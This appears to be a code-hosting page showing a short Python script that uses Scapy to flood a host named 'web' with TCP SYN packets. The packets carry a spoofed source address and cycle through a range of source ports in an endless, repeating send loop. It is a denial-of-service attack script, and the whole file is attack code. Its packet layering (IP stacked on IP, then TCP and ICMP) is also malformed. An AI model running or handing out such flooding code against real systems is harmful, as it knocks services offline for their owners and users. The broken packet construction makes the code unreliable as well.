8 lines
219 B
Python
8 lines
219 B
Python
from scapy.all import *
|
|
|
|
while True:
|
|
for i in range(512,2048):
|
|
pkt = IP(dst='web') / IP(src='192.168.1.69')/ TCP(dport=80,sport=i,flags='S') / ICMP()
|
|
send(pkt, loop=1)
|
|
print("Sent packet")
|
|
|